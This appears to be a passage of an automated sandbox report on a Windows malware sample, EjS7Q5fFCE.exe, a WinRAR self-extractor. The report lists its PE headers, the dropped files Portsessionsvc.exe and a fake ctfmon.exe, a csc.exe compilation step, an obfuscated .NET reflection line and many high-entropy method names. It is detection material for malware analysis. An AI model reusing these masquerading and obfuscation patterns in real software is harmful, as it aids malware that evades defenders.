Source: EjS7Q5fFCE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: EjS7Q5fFCE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: EjS7Q5fFCE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: EjS7Q5fFCE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: EjS7Q5fFCE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: EjS7Q5fFCE.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: EjS7Q5fFCE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: EjS7Q5fFCE.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.pdb | source: Portsessionsvc.exe, 00000007.00000002.2015114062.00000000034EB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: em.pdbB4 | source: smartscreen.exe, 0000002A.00000002.2142062522.000000001B68F000.00000004.00000020.00020000.00000000.sdmp
Source: EjS7Q5fFCE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: EjS7Q5fFCE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: EjS7Q5fFCE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: EjS7Q5fFCE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: EjS7Q5fFCE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, gPIGJGRNbTd3Z8flbUb.cs | .Net Code: Type.GetTypeFromHandle(KWUnMUxlLwAtIN2vRBh.dJOImxtdBgh(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KWUnMUxlLwAtIN2vRBh.dJOImxtdBgh(16777245)),Type.GetTypeFromHandle(KWUnMUxlLwAtIN2vRBh.dJOImxtdBgh(16777259))})
Source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, gPIGJGRNbTd3Z8flbUb.cs | .Net Code: Type.GetTypeFromHandle(KWUnMUxlLwAtIN2vRBh.dJOImxtdBgh(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KWUnMUxlLwAtIN2vRBh.dJOImxtdBgh(16777245)),Type.GetTypeFromHandle(KWUnMUxlLwAtIN2vRBh.dJOImxtdBgh(16777259))})
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline"
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | File created: C:\ComproviderComponentIntocommon\__tmp_rar_sfx_access_check_4944234
Source: EjS7Q5fFCE.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0043F640 push ecx; ret 0_2_0043F653
Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0043EB78 push eax; ret 0_2_0043EB96
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B784B6E push ebx; retf 7_2_00007FFD9B784B74
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B783A16 push cs; retf 7_2_00007FFD9B783A17
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B7800BD pushad ; iretd 7_2_00007FFD9B7800C1
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E15F6 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E0FF7 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E09E5 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E0C0A push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E1208 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E1C04 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E2437 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E0234 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E0F66 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E03AB push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E03DB push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E00F6 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E24F6 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E18E2 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E0502 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E155C push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E014B push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E186B push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E0E5E push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E1299 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E0891 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E0494 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E147E push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E00A1 push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E22DC push ss; ret 7_2_00007FFD9B97F349
Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Code function: 7_2_00007FFD9B8E00A1 push ss; ret 7_2_00007FFD9B97F349
Source: Portsessionsvc.exe.0.dr | Static PE information: section name: .text entropy: 7.445411118925638
Source: iEIWJugOSvvEyboGDFYpQ.exe.7.dr | Static PE information: section name: .text entropy: 7.445411118925638
Source: ctfmon.exe.7.dr | Static PE information: section name: .text entropy: 7.445411118925638
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, WgDGxkD2yWtttoET65H.cs | High entropy of concatenated method names: 'rC9', 'method_0', 'c0C2dAjGEAq', 'sk82dXpeTNd', 'N2dtJD2ukDU5anyLXBPp', 'yqGs8d2u5v2FDfpQiGJn', 'XOWHZp2upCH0mg94jGq4', 'o8jif52uRpVAPTSwrmn7', 'n8jAZt2u7979pslOEQJN', 'bGpt4W2ux9QmFDBsBjCb'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, rfA2AjyjScoc2qjjwIw.cs | High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'YLw2dgcynKF', 'K7V2y23yiSC', 'fT8CDs2swvILcvd2NsNR', 'ROZLKD2ssBW2o5vainu7', 'bakfgT2sv8nGMpQh4bgD'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, FbwWikK17HjWWnERbUK.cs | High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'I1eAa52rVu72bfNNdP6q', 'HW7nTu2r3GrOpJsoDuOM', 'OMoXyD2rb0JwS9TGquom'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, OoMv4MtiM0pA6jkFG9j.cs | High entropy of concatenated method names: 'OUs2dHyU6X3', 'es4tcmW9lG', 'l10tFJmIbX', 'r2jt3i2YfY', 'hQejwo2kivbSj8cQHQDb', 'V8epTo2kJP28R0EQfV8t', 'sS1qxi2kc8eIOUYnF2nG', 'a0y27f2kFDkvJ9eee0u2', 'GxWlnw2k3B9mNwpVg5TH', 'aeHDRp2kbmS9bJ7cPRyB'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, tQdJj5Nm3YUN61UElT.cs | High entropy of concatenated method names: 'eNm6ssZCI', 'oNQ3n4296YvSmg5dM0r7', 'vQHBbq29aeYd9Wt4XiCX', 'GQLWvi29QgUhaDlc3juu', 'Eb4ANxSns', 'rUpX7PnD3', 'Ar6DrSuiC', 'QvmWWILw1', 'bpOEZfeMV', 'lRLonCHSP'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, hsAEuHIbWm3Buc9Arfw.cs | High entropy of concatenated method names: 'kTxgYytMme', 'iHriBD2wy4w9Ws4Hk48C', 'w5NKeC2wmlqOQXofqG6L', 'VIJCpV2w0TOn8VZUymiy', 'XxD8bl2wY0TQjjHCttyA', 'KPyfvJ2wIdm2hPA7GeNO', 'fCQIM32wgpTUxsoNR8Sk', 'L4avAy2wdAfIthiVdZDE', 'B8KG2C2wq7DoBl3klah0', 'XqOgZVNe8Z'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, HW6aHFAPr4FjLunAd35.cs | High entropy of concatenated method names: 'RsQAKarJSs', 'htKspJ2f8fFGOfl0tbd1', 'S3d7BA2fq4nTBOwd8LPv', 'KCDcMb2fUJXQbqHBJTwm', 'Wttl482fe4tE3cQ9WMWq', 'Iw2AsKiUyY', 'A5RAvZIbQs', 'zd3AaTv74u', 'V16uby2fmEhF5m7H9SVk', 'jXZdqC2f0Nw8p172ABHy'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, YjhQ34dUUWdJqY9GsE6.cs | High entropy of concatenated method names: 'aL0de5cUb5', 'FBddnOuyoH', 'TpAdl5yBaL', 'wnXPVT26oJebLVL5XZZD', 'tBPuLA26HdoMcXehkG50', 'KdkBT126WekEYoUBH0mH', 'd43Fte26E7ASYid4raMr', 'LpcmIs26jBXkw1Abv00y', 'RLFaGi269Sxqa6R90r0a', 'CN2aFB26ClyXcNStyKuR'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, jWHm3l0604kjATqG9Xk.cs | High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'S1h2dUnKbEG', 'K7V2y23yiSC', 'j6HCO72aJuCqIiyH8Sue', 'p7h0Vq2acAu3EiLg4NG7', 'LFMrMM2aFRalbZUMHpY4'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, AHUTkiwvJVFKxYeZHUu.cs | High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, nXSHg9Xlf7DJN4RpgP4.cs | High entropy of concatenated method names: 'NhXXXLm9Cp', 'YHKcp02uZCYl0ENn8UFj', 'bu8rgE2u2Il2iWh56Arh', 'pmyUY52f4TiRAKqBNQja', 'lnI4gT2fzl4Xp1e74j9I', 'b1iTnC2uInY8rN2Z4JkO', 'nA4XLBKK0u', 'FWqloK2fpY4VZV9Cp9Xp', 'DJVFBB2fkFBCVt7cpPf6', 'qiFyFI2f58nm7MRLhEDE'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, AkoqAkPrhcvqaEMIRlI.cs | High entropy of concatenated method names: 'QFkP5J56vd', 'PbPPp5wnmS', 'AC8PRFfVM7', 'gWnP73rL8y', 'P8bPxuhgYV', 'fJ2wJx2FgCHxZDVaK4hk', 'Fmk9k32F2rp9CHjbheOf', 'sPSQwV2FI1AZ7bmFqa0u', 'qVESld2FypbFRbFS0BlS', 'JGWXlS2FmgKkDA4YEWr3'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, JsyYdHP40mmbJAN8wo6.cs | High entropy of concatenated method names: 'o3kwZctGJQ', 'XLdw2n837B', 'xqTwIPKXse', 'GX7wgpt3PL', 'vQdwyOHnhR', 'ca0wmhYTJR', 'qUIZud2F8P3oE3WyVKA3', 'bZcBBI2FqZbndooXXOyC', 'fmOVJt2FUydh0QNnFvHO', 'i3m9v52Fe9XrE5HNpBV0'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, rj73Ft6bjwFI3K7R7CF.cs | High entropy of concatenated method names: 'XSNZQO2rDgqdZvmFYOBE', 'bae3mL2rAnRtOKybnIqP', 'u0NlYH2rX17tMJKOE2r9', 'ThGTRs2rW4KTDJmF73d9', 'N3f6r9eWQZ', 'Mh9', 'method_0', 'Y7S6klTyVQ', 'uFq65c6baV', 'Svp6paa0Lg'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, Pg35RcY2OqpQtfSYmVf.cs | High entropy of concatenated method names: 'yr0YgenwM1', 'qDlYyOGUUg', 'bxfYmZLuB8', 'JCZc412Q8lNJ4y40KHeA', 'j2cYwP2QqixBXKtRd16N', 'LuNlEc2QUjpi0FhS2jcx', 'pTCUYD2Qe1qbDJVT6OXi', 'IPn2V62QnpU4TWPo3xqF', 'T8xACZ2QlIqqNSMy6aoF', 'WtOXDk2QGiHRF2KApnyD'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, XT37q29vFnrwgRB2BBt.cs | High entropy of concatenated method names: 'method_0', 'RUI9QuRoEW', 'o2m96p1rap', 'q7f914ZguD', 'PLj9KZV0WM', 'Nqa9MIYT8G', 'rT49tLu9eW', 'L7fk8J2J1UPVVRqDRoBo', 'qdLFwU2JQyFAlA4TqDh2', 'qQsI4U2J6OTfo3XkKt15'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, zaZ0YfAkuIw6HegpZX5.cs | High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'IN22dn2LZH2', 'Df72yJ28YuA', 'JqYqia2fsXNWFaAoM4fe', 'hRajvF2fvuCZj4fAPoaD', 'zmZCJo2faaubpZg4OyFs', 'GxBAHg2fQ7h7OWXsmTDH', 'gQGaBw2f6mJf6GMZaU0V'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, CfAecytqfujxxU8Luys.cs | High entropy of concatenated method names: 'pj4tHuYfYZ', 'Wsw7x42kauMRDQd5mCVr', 'rZ1Ui32kQe50RS4esZ5t', 'rxjg4s2ksRyTL4FU5B6D', 'qqFsRD2kv2ElHDbZ3Uyf', 'mYbUNA2k6k3u1HLLFl3E', 'IPy', 'method_0', 'method_1', 'method_2'
Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, iC9iJ2s40mBbr836qpX.cs | High entropy of concatenated method names: 'KfJvZWqqCd', 'A5Bv2n6kca', 'Yd7', 'GNxvINM51Y', 'U7gvgdd82R', 'm1EvyDYKW1', 'wUyvmShiob', 'BrLT862bqQXhla88EkbI', 'utwBpF2bU4pvS2CcnJjZ', 'vOVSuS2b8LyujaGA0CKO'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, TSLPXZxSm9iEaDAau7u.csHigh entropy of concatenated method names: 'zhp20aVPEdi', 'D5Q20QQaZhx', 'HJB206k29we', 'qJ8201qaew4', 'Oro20K6Vf2b', 'YDp20MI8Mk2', 'pqc20tuQ9xl', 'gTY4mw0X4T', 'BV220S3WpXk', 'klS20fndsVM'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, McIVxKwfrIRMfforS7r.csHigh entropy of concatenated method names: 'qPdwhVe2yS', 'OOywBiNkq0', 'qcpwicwFAF', 'uJgwJOhZmy', 'BJQwcQUc3w', 'vyEwFwTqQY', 'p3Pw3TgwVj', 'J11wbAiqoj', 'P7FwVJrPv6', 'poIwrXjGAu'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, wyBPKNGEtagDJ1ctY0C.csHigh entropy of concatenated method names: 'XYBAn1RE1H', 'ShYAlw98vy', 'Gq90pK2SVYFRxIL2bP4s', 'fPutLj2S3Cxrx9r5BnWm', 'WbYo0r2SbXMBVFtMK3db', 'EWcpKa2SrAEFJ3sR1kDg', 'lradqO2Skbcht2118X58', 'LIGAARcDeR', 'MvM1h52S738tsj87mtS5', 'SKahxL2SpQ8IU6O2KiwS'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, mtHJExmqLjcHW3q7dic.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'rd82dmCH8IX', 'K7V2y23yiSC', 'wLMgd82vA5BiKOYVqakN', 'g8T9eF2vXtMTVY15dvEq', 'M32xfE2vD3tKDd1tDQpi', 'f5N1sL2vWVJBnpM8aUth'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, WHpYJQDLLNx1Eh0nRFp.csHigh entropy of concatenated method names: 'gKJFss2h6AwRR0EK2JCS', 'MF17FT2h1OPA6EN5U9uG', 'Awtedc2ha255HkZQL152', 'Eq18jv2hQSQFNAYXCuuL', 'method_0', 'method_1', 'P2TDNu35FM', 'T11DTvFmhh', 'cl0DAicquH', 'Bg8DXYtDFx'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, rYFE3bIvrpW8L7mgamJ.csHigh entropy of concatenated method names: 'MdfIup0uLt', 'Ls4Ihx6DEc', 'Tiyw4M2PhxTDiuZTVPBd', 'du0UFq2Pf3N27bRRbwdc', 'tXZJlf2PuA546abFHrmt', 'rh3aKc2PBG68e9sAGTeX', 'G21IchmPJo', 'tyuhXS2PFJtB3ra4UdlJ', 'eRSKud2PJxdm2p1ek7NE', 'VTbGVZ2Pc79VwGmyvT5Y'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, yDaau4dJohhkN85ktBd.csHigh entropy of concatenated method names: 'mDCdpn6cSF', 'c5Gtnu21eDa1SapV3OZJ', 'JrEcjc21nBhNYH1p1Wvn', 'vfphcG21lmV3PKLs9M4t', 'M7Zgnk21GWSxZmpfSwxN', 'P9X', 'vmethod_0', 'DhB2yCoUaQB', 'imethod_0', 'Dtgf5t21qWcDOCWdLGPl'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, K5InK7XBaYtKnTNPSM8.csHigh entropy of concatenated method names: 'kFoXJuWwHc', 'oqCXcjhFjS', 'z5TXFABn3J', 'uSItOf2uwUfp66Y9AcFd', 'S83scm2uCSZKKbILsftQ', 'JZY9px2uPeno7Ug0Kgmp', 'phq1B22uslcsL8wtTxAc', 's8uDbL2uvQ8byr0q0R9I', 'MZW4qO2uayWLX87TLZ7P'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, skYCSpXprG7VSo9QaTy.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'GjNX7YOefV', 'TK22dT3WoGW', 'fqZn7c2ucochMmN8beYD', 'B5bn932uiksHf6mRHHLS', 'vgcrn42uJe17tSkqP25Y', 'cMDeSJ2uFH1kcCXVvONZ', 'KxwDwu2u3alLWFcDO9nV'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, IWmKVFzfHVDuyM4m61.csHigh entropy of concatenated method names: 'luI22GvI8T', 'vsq2gA7sLL', 'Ecw2yS2Mvm', 'iqU2mVwKcp', 'fUe20YoEeQ', 'PPL2Y2PXEO', 'uEG2qhPcVy', 'LKnuFd2CUTka0u7dySj2', 'auuk8Z2C8VM5OJH40leh', 'Ymvs8j2CequMPVL3E4Kx'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, ACrIJ9kvcpoEgCucdJF.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'BS1kQTRipI', 'rV7vvr2pR0R6qnI50hdg', 'TKhNVy2p7X4EgYqvr37d', 'qjQvwK2pxCEijOyJkyFU', 'puCFL92p4bQ7hdfCG5DB', 'GqpZcv2pz6W6e3sHcan6', 'jZDcAR2RZ3SH01uMUoaq'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, s6PXDpXtF0MVI8tlLTA.csHigh entropy of concatenated method names: 'N2N', 'H762dGsmxi3', 'RFHXfH5WUf', 'j1q2dLmGRAB', 'nvXw8R2uWIqPWguCbtAA', 'MS2Lv82uXxUZEkxZq2ic', 'SULWYN2uDjkXsBNDcAv4', 'Ta1sBG2uEy6WZYI0DLmQ', 'VaR8pE2uoXYrsJPRv2eB', 'cqoeIq2uHqBGElX2E7G4'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, gPIGJGRNbTd3Z8flbUb.csHigh entropy of concatenated method names: 'zKHiu32xOdSIF2fyHlf7', 'OD68bk2xN2O0Pk0gv6TR', 'VDC7kcxQ2s', 'CelSxm2xDhcMDtZdkZWh', 'HSrMiU2xW8aRuoLxvEwG', 'g5SJc32xEgAKBKFyWHvY', 'YtGONk2xouc7eXwFb0B4', 'g39edx2xHqTpTI0J4Lxs', 'm8Jdua2xjj991RmR3RZw', 'quiQlP2x97bLNBt5qHCZ'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, wM5lO398lmo4aVsRj4v.csHigh entropy of concatenated method names: 'Su49nNO1OW', 'BhL9ltJ06v', 'tFM9GZiBFy', 'Chr9LPeq8f', 'jgk9OK8rCF', 'Jubogq2JodYMRON2L4Pr', 'sGoglC2JWh6M3wT3IZcb', 'XsZ9OS2JE6nxkY0exrBD', 'OHAd0k2JHrF3i5JGhxVI', 'CpEIEv2JjyqTp4mIXP9I'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, Lae65rYAET89QVW3Bnx.csHigh entropy of concatenated method names: 'VI6YP6TjpK', 'H6Lc772QFlbIgBR93L0a', 'b1bN0d2Q3BVgmKvLGm6I', 'fwJTGU2QJsH4OCOaVcg3', 'rgZCsa2QcqEMkpu6REuM', 'ww9eEy2QbTmKyO1Xd2Tb', 'iJtYD7WJHP', 'o6cYW8V589', 'auOYEUNXnP', 'jKcYoLunkh'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, eYVGU20ukkiepvkgBKl.csHigh entropy of concatenated method names: 'Fkc0pgZEKC', 'daQ0RGxeE9', 'xXC07J8BP7', 'BQ3uVv2Q0xc3YfJ6kcij', 'uv7y6V2Qy4FNkB2Hfhyo', 'RkZt5p2QmdxFOut19Qk1', 'OjbyQ02QYeP78Y1vpQcF', 'nS10BdRc0n', 'MhC0iOh7Ge', 'ygR0JhhSy1'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, uGpo0ZAtERfDOYJtGqu.csHigh entropy of concatenated method names: 'QaPAJR0GlJ', 'XxhAc0e7rY', 'oUeAFThyP3', 'bbXtNA2fXItbqG3ktREC', 'mciijQ2fDaioI0XsYmSy', 'oE7DDB2fT2Wri5NdvFOb', 'M4R1tF2fAgCO5cu8VY5T', 'dPlAftIAG4', 'TTsAuSM6Uo', 'U41AhTo4AY'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, kRTTRPIXM6Rw7o9Fu5b.csHigh entropy of concatenated method names: 'fGJIWMBxtU', 'NUIIEBPfkb', 'SoarLT2PPZPKEGf5ZDnk', 'L6mqlv2P9IGRE4mTioL0', 'GA6EXi2PC3bZlcCMFyuZ', 'lrV8Ug2Pwr412vCYTmQi', 'vyd1AD2Psc4HkqjYNbhC', 'xv4OD92PvXvZ0nNcqp5F', 'Rwpu9F2PaSZmX8sf6qCp', 'ebvotK2PQl3segjBCwos'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, zlFQmZoVGbZY7gKYC6H.csHigh entropy of concatenated method names: 'dpMokdciig', 'n53o5qtsex', 'NOoopGUUMt', 'InuoRROIxQ', 'B8Vo7pYjiL', 'QEpGAy2iyaylE44uW9v7', 'QGu6dh2iIiwsoGJsfNvn', 'J0aGAH2igl0Nh16vj3qn', 'iqw7NE2imfssR1aZywiO', 'sSe2WC2i0INOFpejtOx3'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, RoO5lEvdU0wKXZ9LI70.csHigh entropy of concatenated method names: 'fr9vUoa1xs', 'uAnv8uCXEE', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'l9jveRasFK', 'method_2', 'uc7'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, OQxOZvySYqaQwpBJSR2.csHigh entropy of concatenated method names: 'Yltyx8LKsv', 'UbUEA02v0HkvQFyFySLQ', 'boQsl52vYcsqyY5xUjeD', 'EaxihF2vyekGkaXkZ23D', 'oMfHCa2vmbgCNujw9cLO', 'JPZrS32vqvtQNncZi0F8', 'qdB9E02vUjKrMVNe5qZe', 'ul8FoN2v8O0HFWoZA9Y5', 'mpfm0CRUlT', 'dmGKp72vGCMVIPS2NQA6'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, eg5dorX3QobRqwYbBVr.csHigh entropy of concatenated method names: 'Bdt2dOwdjj1', 'lv0XVqSsGS', 'lO92dN55RmO', 'FyPBY22uKMFXpGZwmppP', 'lMbpvD2uML8C14DHg6ot', 'pUROpH2u6QwnUi0W3JPy', 'znWU272u1lVRBqli9FZw', 'xGe3Q52utos2q4BewXYT', 'Wq6AIQ2uSp7l3uox3AMI', 'yiTp2R2uf2rTtJY9uuco'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, UU0gQIql19adeUOJBQR.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'l2apCB21SPpKFGaCPEFb', 'uJRfWk21fmcZ14UjNeJA', 'LOb3rA21uPo0ZytGTUq0', 'VlYqLp2PPZ'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, L4OKt6dOKIjbFhUFw3I.csHigh entropy of concatenated method names: 'vbbdXqOKQG', 'K7uja026MD3VVYXiM0Mg', 'P3BSoh261pbPJZr2CK0r', 'aBhNAM26K0XRq5mKFVyk', 'fasdT5Jyro', 'CZSkhM26v8LBPp9xeyq5', 'xbJVeH26aTYuAsv0pblo', 'Ncowwn26wsAo6XawYiUl', 't8IdVB26s577R4jOvKr7', 'KLCEZ726QnWmC3pjneU2'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, blt6xEYqdhBAUO82MDo.csHigh entropy of concatenated method names: 'xKHY80JtTJ', 'DKCYecXV8N', 'ljEtrb2QXIxMrHiP8aGv', 'Ya03Cv2QTfFmYNg2FjDM', 'xVvTAb2QAv54Iplu6EdR', 'MT7kPl2QDyCHGTfPcwDD', 'IqtOMu2QW3bbSNwp9in1', 'pFhp542QEhKDj9MaCl2u', 'YR7x0Y2QoouOXQWe1rlr', 'k3GFsf2QHPFZ0ctLrPOR'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, KvFquTdCtlFmVGm43hY.csHigh entropy of concatenated method names: 'D69dwNXung', 'RxjdsaaRSC', 'YDrdv50emH', 'JcodauNGb7', 'oJZdQqox7O', 'qdCd6RlOUr', 'r8IHeQ26kiPaNjvRmZAR', 'x6I1Z3265KT6JC04ZsdA', 'viQekI26pZjYbvL8IpDU', 'VE3peb26RlXMq8mSXBOk'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, QScBSpoUF7B9JkuS5PR.csHigh entropy of concatenated method names: 'jQCovh1n2n', 'TKBoecqXmE', 'GAmongcelD', 'ey6oloPZyP', 'KQAoGRcbMR', 'CTToLqrnsF', 'zsOoOqUUDe', 'a8PoNbRadi', 'TK8oTKa9m9', 'j3LoALCMs6'
